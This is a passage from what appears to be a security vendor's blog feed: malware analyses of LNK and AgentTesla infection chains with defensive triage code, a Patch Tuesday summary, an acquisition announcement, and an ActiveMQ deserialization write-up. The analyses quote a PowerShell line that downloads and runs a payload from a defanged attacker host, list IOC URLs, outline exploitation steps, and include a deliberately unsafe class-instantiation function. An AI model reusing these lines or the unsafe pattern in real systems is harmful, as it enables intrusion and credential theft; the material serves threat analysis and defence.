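    out: Dict[str, object] = {"hidden_window": False, "policy_bypass": False,
                              "no_profile": False, "decoded_script": None, "download_cues": []}
    i = 0
    while i < len(toks):
        t = toks[i]
        short = t.lower().lstrip("-/")
        nxt = toks[i + 1].lower() if i + 1 < len(toks) else ""
        if _switch(t, "windowstyle", "w") and nxt.startswith("h"):
            out["hidden_window"] = True
            i += 2
            continue
        if (_switch(t, "executionpolicy", "ex") or short == "ep") and nxt in ("bypass", "unrestricted"):
            out["policy_bypass"] = True
            i += 2
            continue
        if _switch(t, "noprofile", "nop"):
            out["no_profile"] = True
        # -e, -en, -enc, -EncodedCommand and the documented alias -ec all select it.
        if (_switch(t, "encodedcommand", "e") or short == "ec") and i + 1 < len(toks):
            try:
                out["decoded_script"] = decode_encoded_command(toks[i + 1])
            except (binascii.Error, UnicodeDecodeError):
                out["decoded_script"] = None  # not valid base64/UTF-16LE
            i += 2
            continue
        i += 1
    script = out["decoded_script"]
    if isinstance(script, str):
        out["download_cues"] = sorted({m.lower() for m in _CUE_RE.findall(script)})
    return out


def is_suspicious(report: Dict[str, object]) -> bool:
    """Hidden window plus an encoded script that fetches or launches something."""
    return bool(report["hidden_window"] and report["decoded_script"] and report["download_cues"])


SAMPLE_CMDLINE = ("powershell.exe -NoLogo -NoProfile -WindowStyle hidden "
                  "-ExecutionPolicy bypass -EncodedCommand " + encode_command(SAMPLE_SCRIPT))

if __name__ == "__main__":
    report = triage_command_line(SAMPLE_CMDLINE)
    print(report["decoded_script"])
    print("cues:", report["download_cues"], "suspicious:", is_suspicious(report))
```

The same function can be pointed at process-creation telemetry (Sysmon event 1 or Windows event 4688 command lines), where a powershell.exe child of explorer.exe with a hidden window and an encoded downloader is a high-signal pattern regardless of which LNK file name was used as the lure.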

Meanwhile, a decoy image of a product is displayed. In the screenshot below, an image of what appears to be a Reebok-branded outfit is shown when the malicious LNK file named “New product Reebok 2023.lnk” is executed.

Figure 2: Reebok outfit

During our analysis, a file named svczHost.exe was downloaded in \Windows\Temp.

Figure 3: powershell.exe connecting to a remote host to download a file, which was saved into the Temp directory as svczHost.exe

This then further downloaded another file named MyRdpService.exe in the same directory.

Figure 4: svczHost.exe connecting to a remote host and downloading an additional component that was later written into the Temp directory as MyRdpService.exe

As seen in Figures 5 and 6, MyRdpService.exe was repeatedly observed connecting to a remote command and control (C&C) server, sending and receiving encrypted data.

Figure 5: MyRdpService.exe constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 6: Encrypted packet sent to remote C&C by MyRdpService.exe

Figure 7 shows a log file named logrdp.txt, which appears to be a connection log. Interestingly, the log file contains some text in Vietnamese.

Figure 7: Log file

We have seen an increasing number of malicious LNK files used by cybercriminals to deliver payloads. These Windows shortcut files can carry a command line that abuses legitimate Windows system tools such as PowerShell, a simple way for criminals to evade detection while the shortcut itself contains no executable code.

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

• GAV: Suspicious#powershell.steal (Trojan)
• GAV: Infostealer.AIL (Trojan)

This threat is also detected by SonicWall Capture ATP with RTDMI and by the Capture Client endpoint solution.

SonicWall Empowers Partners with MDR and SOCaaS

The cybersecurity landscape has never been more complex. As threats grow in number and sophistication, budgets and headcount can’t keep up. In response, many IT teams have turned to managed services for their cybersecurity needs — so much so that by the end of 2023, an estimated 41% of SMB cybersecurity spend will be allocated to managed service and system integrators, up from 35% in 2020.

But these MSPs (Managed Service Providers) and MSSPs (Managed Security Service Providers) are often facing the same challenges as their clients: they lack a team of dedicated threat analysts and researchers to help manage and respond to the never-ending stream of security alerts from disparate point solutions.

To effectively bridge these gaps, SonicWall’s global network of MSPs, MSSPs and other channel partners must move from a network of unmanaged point products to a seamless platform of managed security solutions. That’s why we’re pleased to announce we’ve acquired Solutions Granted, Inc., a top MSSP based in the United States — a move that will add several key technologies to the SonicWall portfolio, including Managed Detection and Response (MDR), Security Operations Center as a Service (SOCaaS) and other managed services.

Meet Solutions Granted

Since its inception, Solutions Granted has worked with SonicWall to deliver best-in-class cybersecurity to MSPs. The company has spent the past 18 years focusing on its open ecosystem, solving alert fatigue and empowering MSPs to better secure small- and medium-sized businesses (SMBs).

Solutions Granted currently delivers world-class managed security services to MSPs throughout North America, including thousands of channel partners serving SMBs. Based on the strength of its services and support, the company has emerged as a clear leader in the security space, winning numerous awards, including the CRN Security 100 list (2018-2021), Top Global MSSP List (2018-2021) and BlackBerry Cylance MSSP Partner of the Year (2018, 2019, 2021).

We are excited to welcome the expertise of the Solutions Granted team, particularly their CEO Michael Crean. Crean will assume a critical leadership role, advising on the ongoing process of seamlessly integrating Solutions Granted services with our products and partner offerings.

Crean is a 20-year veteran of the channel who has built a career characterized by a passion for enabling the MSP community on practical approaches to cybersecurity.

His vision of bridging the gap between information technology and security — and his commitment to providing solutions tailored to customers’ business goals, ecosystem and compliance standards — pushed Solutions Granted to quick and enduring success.

New Solutions and Services

Solutions Granted will augment partners’ managed service portfolio by extending new core offerings:

MDR for Endpoint: Comprehensive service that includes 24×7 threat monitoring, threat hunting and detection/response to all types of threats from many different points of entry

MDR for Cloud: 24×7 protection from advanced phishing and SaaS threats that make it past Microsoft 365 and Google Workspace’s defenses

SOCaaS (Managed SIEM): Centralized log management service unifying disparate security alerts and logs, designed to aid with threat investigations and compliance

Vulnerability Management: Network discovery and vulnerability management solution that identifies and prioritizes risk to your attack surface.

These services represent natural add-ons for MSPs looking to better meet customers’ evolving security and regulatory requirements. Solutions Granted services are already integrated into existing SonicWall offerings, such as firewalls and SMA (Secure Mobile Access) series, and there are other exciting developments on the horizon — including an MDR solution leveraging SonicWall Capture Client.

Benefits to You, Our Partners, MSPs and End Users

The initial acquisition of Solutions Granted was driven by an increase in partner requests for these services — and our partners will remain at the heart of SonicWall’s strategic plans going forward. Solutions Granted’s customers are many of the partners we do business with today, and this move will help them expand their business, deliver a more complete service offering, and provide advanced tools and talent as a service.

In addition to nearly half a century of combined cybersecurity expertise, SonicWall and Solutions Granted partners will benefit from a streamlined approach for managing security across customer environments, all through the same MSP-friendly unified console they’re accustomed to. And by bringing SonicWall and Solutions Granted technologies together, partners will enjoy an even greater ease of doing business.

Forging Toward the Future Together

Over time, SonicWall and Solutions Granted offerings will become as synonymous and seamless as the products contained within their portfolio. And this portfolio will continue to grow as we harness the power of superior threat intelligence to develop a unified cybersecurity platform meeting the evolving needs of service providers.

To bring this vision to life, SonicWall will leverage internal development, acquisitions and strategic partnerships to constantly innovate and deliver cutting-edge defense capabilities to keep pace with the ever-changing threat landscape.

But above all, this represents a continuation of SonicWall’s renewed commitment to its partners — one that started over a year ago with the adoption of our “outside-in” strategy and has continued with the launch of our SecureFirst Partner Program. As this journey continues, we will empower our valued partner community with cost-effective threat defense services, industry expertise and innovative technology.

Learn more about becoming a partner, or register for our live webinar hosted by Bob VanKirk and Michael Crean to get more details on this important milestone.
Microsoft Security Bulletin Coverage for November 2023

Overview

Microsoft’s November 2023 Patch Tuesday has 57 vulnerabilities, and 15 of them are remote code execution vulnerabilities. The vulnerabilities can be classified into the following categories:

  • 17 Elevation of Privilege Vulnerabilities
  • 5 Security Feature Bypass Vulnerabilities
  • 15 Remote Code Execution Vulnerabilities
  • 6 Information Disclosure Vulnerabilities
  • 5 Denial of Service Vulnerabilities
  • 9 Spoofing Vulnerabilities

Figure 1: A pie chart breaking down the vulnerabilities by category.

The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2023 and has produced coverage for six of the reported vulnerabilities.

Vulnerabilities with Detections

  • CVE-2023-36033 – Windows DWM Core Library Elevation of Privilege Vulnerability: ASPY 505 Exploit-exe exe.MP_351
  • CVE-2023-36036 – Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability: ASPY 506 Exploit-exe exe.MP_352
  • CVE-2023-36394 – Windows Search Service Elevation of Privilege Vulnerability: ASPY 504 Exploit-exe exe.MP_350
  • CVE-2023-36399 – Windows Storage Elevation of Privilege Vulnerability: ASPY 503 Exploit-exe exe.MP_349
  • CVE-2023-36413 – Microsoft Office Security Feature Bypass Vulnerability: ASPY 507 Malformed-docx docx.MP_10
  • CVE-2023-36424 – Windows Common Log File System Driver Elevation of Privilege Vulnerability: ASPY 502 Exploit-exe exe.MP_348

Remote Code Execution Vulnerabilities

CVE-2023-36017   Windows Scripting Engine Memory Corruption Vulnerability
CVE-2023-36028   Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
CVE-2023-36041   Microsoft Excel Remote Code Execution Vulnerability
CVE-2023-36045   Microsoft Office Graphics Remote Code Execution Vulnerability
CVE-2023-36393   Windows User Interface Application Core Remote Code Execution Vulnerability
CVE-2023-36396   Windows Compressed Folder Remote Code Execution Vulnerability
CVE-2023-36397   Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
CVE-2023-36401   Microsoft Remote Registry Service Remote Code Execution Vulnerability
CVE-2023-36402   Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2023-36423   Microsoft Remote Registry Service Remote Code Execution Vulnerability
CVE-2023-36425   Windows Distributed File System (DFS) Remote Code Execution Vulnerability
CVE-2023-36437   Azure DevOps Server Remote Code Execution Vulnerability
CVE-2023-36439   Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2023-38151   Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability
CVE-2023-38177   Microsoft SharePoint Server Remote Code Execution Vulnerability

Elevation of Privilege Vulnerabilities

CVE-2023-36033   Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2023-36036   Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2023-36047   Windows Authentication Elevation of Privilege Vulnerability
CVE-2023-36049   .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability
CVE-2023-36394   Windows Search Service Elevation of Privilege Vulnerability
CVE-2023-36399   Windows Storage Elevation of Privilege Vulnerability
CVE-2023-36400   Windows HMAC Key Derivation Elevation of Privilege Vulnerability
CVE-2023-36403   Windows Kernel Elevation of Privilege Vulnerability
CVE-2023-36405   Windows Kernel Elevation of Privilege Vulnerability
CVE-2023-36407   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36408   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36422   Microsoft Windows Defender Elevation of Privilege Vulnerability
CVE-2023-36424   Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2023-36427   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36558   ASP.NET Core – Security Feature Bypass Vulnerability
CVE-2023-36705   Windows Installer Elevation of Privilege Vulnerability
CVE-2023-36719   Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability

Denial of Service Vulnerabilities

CVE-2023-36038   ASP.NET Core Denial of Service Vulnerability
CVE-2023-36042   Visual Studio Denial of Service Vulnerability
CVE-2023-36046   Windows Authentication Denial of Service Vulnerability
CVE-2023-36392   DHCP Server Service Denial of Service Vulnerability
CVE-2023-36395   Windows Deployment Services Denial of Service Vulnerability

Information Disclosure Vulnerabilities

CVE-2023-36043   Open Management Infrastructure Information Disclosure Vulnerability
CVE-2023-36052   Azure CLI REST Command Information Disclosure Vulnerability
CVE-2023-36398   Windows NTFS Information Disclosure Vulnerability
CVE-2023-36404   Windows Kernel Information Disclosure Vulnerability
CVE-2023-36406   Windows Hyper-V Information Disclosure Vulnerability
CVE-2023-36428   Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability

Security Feature Bypass Vulnerabilities

CVE-2023-36021   Microsoft On-Prem Data Gateway Security Feature Bypass Vulnerability
CVE-2023-36025   Windows SmartScreen Security Feature Bypass Vulnerability
CVE-2023-36037   Microsoft Excel Security Feature Bypass Vulnerability
CVE-2023-36413   Microsoft Office Security Feature Bypass Vulnerability
CVE-2023-36560   ASP.NET Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE-2023-36007   Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability
CVE-2023-36016   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2023-36018   Visual Studio Code Jupyter Extension Spoofing Vulnerability
CVE-2023-36030   Microsoft Dynamics 365 Sales Spoofing Vulnerability
CVE-2023-36031   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2023-36035   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36039   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36050   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36410   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

AgentTesla Updates Its Infection Chain

The SonicWall Capture Labs Threat Research team has observed the AgentTesla infostealer being deployed using image (.jpg) files for the last few months. We have observed multiple ZIP files with titles in European languages. Different IPs were seen targeting European nations with the AgentTesla stealer and other bots having a wide variety of capabilities.

Figure 1: Infection Chain

The initial infection vector is an email with a ZIP file as an attachment. Inside the ZIP file is a highly obfuscated VBS script that needs heavy de-obfuscation to extract the next stage. On execution, the VBS decodes the PowerShell code below:

Figure 2: PowerShell Script

This PowerShell script then downloads an image file, Rump_vbs.jpg, from the URL "hxxps://uploaddeimagens[.]com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937".

Figure 3: Image file embedded with DLL

The PowerShell script retrieves a base64-encoded .NET DLL from the image file, where it is embedded between the marker tags "BASE64_START" and "BASE64_END". This data is decoded, and the .NET assembly is then loaded into memory.

Figure 4: Image marker tags

After that, the PowerShell script loads the decoded Fiber.dll, whose method "VAI" downloads and executes a base64-encoded .NET executable from the URL "hxxp://79.110.48[.]52/kenjkt.txt".

This is done using: "$method = $type.GetMethod(‘VAI’).Invoke($null, [object[]] (‘txt.tkjnek/25.84.011[.]97//:ptth’ , ‘dfdfd’ , ‘dfdf’ , ‘dfdf’ , ‘dadsa’ , ‘de’ , ‘cu’))".
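The two tricks described above, a payload hidden between BASE64_START/BASE64_END marker tags inside an image and a URL passed to VAI as a reversed string, are both easy to triage offline. The following is an added Python helper written for this write-up (it is not the malware's code and not a SonicWall tool): it locates the marker tags in a carrier file, strictly decodes what lies between them, checks for a valid MZ/PE header before trusting the result, hashes the payload, and undoes the string reversal while keeping the URL defanged. The JPEG and DLL bytes are constructed stand-ins; the reversed URL string is the defanged one quoted above.

```python
import base64
import binascii
import hashlib
import re
import struct
from typing import Optional

# Marker tags exactly as described in the analysis above.
MARKER_START = b"BASE64_START"
MARKER_END = b"BASE64_END"


def extract_embedded_payload(carrier: bytes) -> Optional[bytes]:
    """Return the decoded bytes found between the marker tags, or None if absent or not valid base64."""
    start = carrier.find(MARKER_START)
    if start == -1:
        return None
    start += len(MARKER_START)
    end = carrier.find(MARKER_END, start)
    if end == -1:
        return None
    # Drop any line breaks the dropper may have inserted, then decode strictly.
    blob = re.sub(rb"\s+", b"", carrier[start:end])
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


def is_pe_image(data: bytes) -> bool:
    """Check for a DOS 'MZ' stub whose e_lfanew pointer (offset 0x3C) lands on a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage_carrier(carrier: bytes) -> dict:
    """Summarise whether a file carries a marker-delimited payload and whether that payload is a PE."""
    payload = extract_embedded_payload(carrier)
    if payload is None:
        return {"found": False, "is_pe": False, "size": 0, "sha256": None}
    return {
        "found": True,
        "is_pe": is_pe_image(payload),
        "size": len(payload),
        "sha256": hashlib.sha256(payload).hexdigest(),
    }


def unreverse_string(s: str) -> str:
    """Undo the character reversal used in the VAI call; a reversed defanged '[.]' comes back as '].[' so fix it."""
    return s[::-1].replace("].[", "[.]")


def defang_url(url: str) -> str:
    """Render a URL so it is not clickable in a report (http -> hxxp)."""
    return url.replace("https://", "hxxps://", 1).replace("http://", "hxxp://", 1)


# Constructed stand-in for the embedded .NET DLL: a minimal MZ/PE header, not a real assembly.
FAKE_DOTNET_DLL = (
    b"MZ\x90\x00" + b"\x00" * 56        # DOS stub up to e_lfanew at offset 0x3C
    + struct.pack("<I", 0x40)           # e_lfanew -> PE signature at offset 0x40
    + b"PE\x00\x00"
    + b"constructed sample, not executable code"
)

# Constructed carrier: JPEG magic bytes with the payload appended between the markers.
SAMPLE_JPG = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
    + MARKER_START + base64.b64encode(FAKE_DOTNET_DLL) + MARKER_END
    + b"\xff\xd9"
)

# Reversed, defanged URL string as it appears in the decoded PowerShell above.
REVERSED_URL = "txt.tkjnek/25.84.011[.]97//:ptth"

if __name__ == "__main__":
    print(triage_carrier(SAMPLE_JPG))
    print(defang_url(unreverse_string(REVERSED_URL)))
```

Run it against a real carrier by reading the file as bytes and passing it to triage_carrier(); a hit with is_pe set is worth submitting for sandboxing, while a marker hit that does not decode or is not a PE usually means a different packing scheme and deserves a manual look.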

The downloaded Fiber.dll is again a heavily obfuscated .NET assembly and carries obfuscated API strings for process injection. Although it has a number of methods, the majority of them contain junk code.

Figure 5: Obfuscated API names for Process Injection

AgentTesla

For a long time, AgentTesla has been known for its wide variety of stealing and logging capabilities.
The txt file hosted at "hxxp://79.110.48[.]52/kenjkt.txt" contains base64-encoded data. The decoded .NET executable is the AgentTesla payload. First, it enumerates all of the Chromium-based and Mozilla-based browsers for the sensitive data they store.

Figure 6: Chromium-based browser’s data

Next, the malware appears to have methods to search for Mozilla login data, including usernames and passwords, on the victim’s machine.

Figure 7: Mozilla logins

Furthermore, it has functionality to retrieve sensitive credentials stored in Windows Vault, referenced by their GUIDs.

Figure 8: Win Vault GUIDS

AgentTesla has keyboard hooking, clipboard hooking and logging functionality. Additionally, it uses multiple APIs to retrieve the keyboard layout and other details, as well as Windows and other system information.

Figure 9: System information APIs

The stealer also carries a list of sensitive strings, or "smart words", that point to an individual’s private and sensitive information. In addition, it checks for different email clients, common database management and FTP software, and a few other well-known applications.

Figure 10: SmartWords and Telegram bot

Finally, the collected data is exfiltrated via a Telegram bot.

Evidence of detection by SonicWall’s RTDMI™ engine can be seen below in the Capture ATP report for this file:

Figure 11: RTDMI ATP report results

IOCs:
SHA-256:
9346658f9a881fa08edcf2d4071ae99f71ada25fbdcad0eaf7dfb204c5867a0d
0f6b26bc3cad49b68ab669c5d9def97db345f6c23b8d0ee9cff48262c2db0743
60304a8c52b10cd71bcc76f8a3ad0f0bbfe7395d2c64833400ac06d3c2c81d58
01ec36cf3833166dbad8aeef0c5683905b31956a5d5367ac52fa7aee2be9c64e

URLs:

  • hxxp://79.110.48[.]52/kenjkt.txt
  • hxxps://uploaddeimagens.com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937

Apache ActiveMQ Remote Code Execution (CVE-2023-46604)

Overview

The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol, causing the broker to instantiate any class on the classpath. The vulnerability is categorized as unbounded deserialization, leaving ActiveMQ open to remote code execution (RCE). This issue has a CVSS base score of 10.0. CVE-2023-46604 is an unauthenticated deserialization vulnerability in ActiveMQ’s OpenWire transport connector, which is enabled by default and impacts both “Classic” and Artemis clients and brokers. Vulnerable software versions include:

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Organizations still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-46604.

The overall CVSS 3.1 score is 10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H).

Base score is 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is low.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Temporal score is 9.4 (E:P/RL:O/RC:C), based on the following metrics:

  • The exploit code maturity level of this vulnerability is proof of concept code.
  • The remediation level of this vulnerability is official fix.
  • The report confidence level of this vulnerability is confirmed.

Technical Overview

Apache ActiveMQ is a widely used open-source message broker written in Java, known for its multi-protocol compatibility. It offers clients the flexibility of choosing from a variety of programming languages and platforms, with support for JavaScript, C, C++, Python, .Net and others.

An attacker connected to the OpenWire TCP port 61616 can send an OpenWire packet that makes the broker unmarshal an ExceptionResponse object instance. By supplying an arbitrary class name together with an arbitrary string parameter to BaseDataStreamMarshaller.createThrowable, the attacker can have an arbitrary class instantiated with a single String constructor parameter.

Exploitation

At SonicWall Capture Labs Threat Research, we have recreated the PoC using the Metasploit framework, as demonstrated in Figure 1.

Before exploitation can occur, the following conditions must be true:

  • The attacker must have network access.
  • The attacker must send a manipulated OpenWire “command” (used to instantiate an arbitrary class on the classpath with a String parameter).
  • A class must be present on the installation in the classpath which can execute arbitrary code simply by instantiating it with a String parameter.

Figure 1 below demonstrates the following steps to exploit this vulnerability:

  • Create and start a vulnerable victim server.
  • Use a Metasploit module to host the poc.xml file on the attacker’s server.
  • Finally, run the exploit by running Exploit.java.
  • Additionally, using a Shodan dork, we can observe over 6,000 vulnerable servers exposed on the internet.

Figure 1: SonicWall Capture Labs Threat Research Exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS:15940 – Apache ActiveMQ OpenWire Protocol Insecure Deserialization

Threat Graphs

SonicWall sensors have confirmed active exploitation of this vulnerability. The graphs below indicate an increasing number of exploitation attempts, and we expect them to continue to rise.

Figure 2: Threat Graph

Remediation Recommendations

Admins still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

If that is not possible, users can mitigate the issue by validating the provided throwable class type in the OpenWire marshallers that handle OpenWire commands. Further mitigation steps are described at the official link.
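The mitigation principle named above, checking that the class a peer names is actually a Throwable before instantiating it reflectively, is shown here as an added Python analogue. This is example code for this write-up, not ActiveMQ's Java marshaller, and the function names are hypothetical: the unsafe variant instantiates whatever class the peer names with a single string argument (the pattern the vulnerability abuses), while the hardened variant resolves the name, refuses anything that is not an exception type, and degrades to a generic error instead of failing open.

```python
import importlib


def resolve_class(qualified_name: str) -> type:
    """Resolve 'package.module.ClassName' to a class object without instantiating it."""
    module_name, _, class_name = qualified_name.rpartition(".")
    if not module_name or not class_name:
        raise ValueError(f"not a qualified class name: {qualified_name!r}")
    module = importlib.import_module(module_name)
    cls = getattr(module, class_name)
    if not isinstance(cls, type):
        raise TypeError(f"{qualified_name} is not a class")
    return cls


def create_throwable_unsafe(class_name: str, message: str):
    """Vulnerable pattern (hypothetical name): any class the peer names gets a single-string constructor call.

    Nothing ties the result to an exception type, so a class whose constructor does real work
    when handed a string is executed with attacker-chosen input.
    """
    return resolve_class(class_name)(message)


def create_throwable(class_name: str, message: str) -> BaseException:
    """Hardened pattern (hypothetical name): only exception types may be instantiated.

    Resolution failures and non-exception classes both collapse into a generic error that
    still carries the original message, so the caller gets a Throwable either way.
    """
    try:
        cls = resolve_class(class_name)
    except (ImportError, AttributeError, ValueError, TypeError):
        return RuntimeError(f"{class_name}: {message}")
    # The core check: refuse to construct anything that is not an exception type.
    if not issubclass(cls, BaseException):
        return RuntimeError(f"rejected non-throwable class {class_name}: {message}")
    try:
        return cls(message)
    except Exception:
        # An exception class with an unusual constructor still yields a usable Throwable.
        return RuntimeError(f"{class_name}: {message}")


if __name__ == "__main__":
    # A legitimate remote error round-trips as the named exception type.
    print(repr(create_throwable("builtins.ValueError", "queue does not exist")))
    # A non-exception class is refused rather than constructed.
    print(repr(create_throwable("pathlib.Path", "/tmp/constructed-example")))
    # Unknown class names never raise out of the marshaller path.
    print(repr(create_throwable("no.such.Module", "constructed message")))
```

The same check is what a patched marshaller has to perform before reflection: the wire format tells the broker a class name and a message, and only the receiving side can decide whether that name belongs in the set of types it is willing to build.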

Relevant Links